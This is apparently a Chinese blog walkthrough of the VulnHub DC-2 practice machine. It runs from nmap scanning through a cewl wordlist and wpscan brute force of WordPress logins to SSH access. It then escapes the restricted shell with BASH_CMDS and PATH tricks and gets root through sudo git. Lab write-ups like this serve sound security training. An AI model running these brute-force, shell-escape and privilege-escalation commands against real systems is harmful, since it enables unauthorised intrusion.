DC-2靶机上了解和练习WordPress框架

简介: 本文介绍了在一个名为DC2的虚拟环境中进行渗透测试的过程。首先通过扫描发现SSH和Web端口,并进行全端口扫描以寻找隐藏端口。接着通过信息收集、漏洞利用(如SQL注入、文件上传漏洞等)、反弹Shell及提权等步骤逐步攻陷目标系统。文章详细描述了使用Cewl生成字典、Dirsearch扫描目录、Wpscan枚举WordPress用户等技巧,并最终通过SSH登录和Git命令实现了提权,获取多个flag。

扫描出两个端口ssh web

一、环境搭建

dc2https://www.vulnhub.com/entry/dc-2,311/

二、思路

信息收集—> 寻找漏洞—> 利用漏洞(sql注入,文件上传漏洞,框架漏洞,ssh攻击等)—> 反弹shell

—>进行提权

解析成了域名但无法访问

可能会有隐藏端口,于是全端口扫描一遍

这里记录一下用到的几个参数

-sS :             TCP同步扫描 (TCP SYN),因为不必全部打开一个 TCP 连接,所以这项技术通常称为半开扫描
-A :             采用全面扫描的方式

-p:   指定端口

-sV              对端口上的服务程序版本进行扫描
-T0-9          扫描速度,一般T4就够
-O               扫描探测目标主机的操作系统

提示未能重定向到http://dc-2/

这里需要进行更改本地DNS文件否则访问不了,我们修改一下/etc/hosts文件

成功访问进网页获取到第一个flag

Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
你通常的单词表可能不起作用,所以,也许你只需要保持清醒。
密码越多越好,但有时你就是无法赢得所有的密码。
以一个人的身份登录以查看下一个标志。
如果找不到,请以另一个用户登录。

提示我们需要用到cewl 生成字典

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具

cewl http://dc-2/ -w /root/桌面/dict.txt

//:这里不能用 cewl http://192.168.18.193 -w passwd.txt

会没有任何输出,因为重定向,需要用域名

发现此网站框架是WordPress

,再用dirsearch工具扫描一下此网站的目录。

dirsearch -u http://192.168.18.193 -x 403 404 405 500

发现没有装使用dirb发现管理员登录页面

此时,有登录框,密码字典,需要寻找账号

我们需要用到Wordpress。

Wordpress有一个著名的扫描工具wpscan

更新工具wpscan --update

wpscan --url http://dc-2/ -e u      //列举出用户名字
-e u 枚举用户名,默认从1-10

使用wpscan爆破账号密码

wpscan --url http://dc-2/ -U u.txt -P dict.txt

// u.txt 账号字典 dict.txt 密码字典

登录成功,进入页面找到flag2

Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.

如果你不能利用WordPress并走捷径,还有另一种方法。
希望你找到了另一个入口。

flag2提示我们可以走另一个入口,让我想到了ssh,于是我们使用tom用户进靶机远程ssh登录。

ssh user@rhost -p rport

发现登录上了,进行权限查看,发现有rbash限制。

compgen -c   //查看我们可以使用的命令

绕过rbash

  1. # 利用bash_cmds自定义一个shell
  2. BASH_CMDS[a]=/bin/sh;a
  3. # 添加环境变量
  4. export PATH=$PATH:/bin/
  5. export PATH=$PATH:/usr/bin

flag3

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力而死。

flag3提示我们su,我感觉是要我们切换到另一个用户,于是我用ssh远程登陆了jerry用户发现登录不上。

提示我们使用su

su jerry
adipiscing
find / -name *flag*

找到flag4 flag4

Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).  
No hints here - you're on your own now.  :-)
Go on - git outta here!!!!
很高兴看到你已经走了这么远——但你还没有到家。
你仍然需要获得最终的旗帜(唯一真正重要的旗帜!!)
这里没有提示——你现在要靠自己了。:-)
走吧,离开这里!!!!

sudo -l

发现了我们可以使用git命令,而且flag4提示我们也有git命令,所以说很有可能是用git命令进行提权,我们去提权网站搜索一下git命令如何进行提权。

sudo git -p help config

!/bin/sh

退出就提权成功了找到flag5

相关文章
|
1月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
31 4
|
1月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
37 4
|
2月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
36 0
|
2月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
40 0
|
安全 Shell 数据库
Vulnhub靶机DC-1渗透笔记
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/
107 2
Vulnhub靶机DC-1渗透笔记
|
存储 SQL 安全
VulnHub靶机DC3渗透笔记
Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five86.com/downloads/DC-3-2.zip
130 1
VulnHub靶机DC3渗透笔记
|
存储 网络协议 网络安全
VulnHub靶机DC2渗透测试笔记
靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
84 0
VulnHub靶机DC2渗透测试笔记
|
安全 关系型数据库 MySQL
DC-1靶机渗透(教程以及思路)
DC-1靶机渗透(教程以及思路)
143 0
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
327 0
|
存储 缓存 安全
数据中心(DC)网络虚拟化框架
[RFC7364]问题陈述:网络虚拟化overlay 定义了使用overlay网络构建大型多租户数据中心网络的基本原理。这些大型数据中心经常使用计算、存储和网络虚拟化来支持大量的通信域和终端系统。
951 0
数据中心(DC)网络虚拟化框架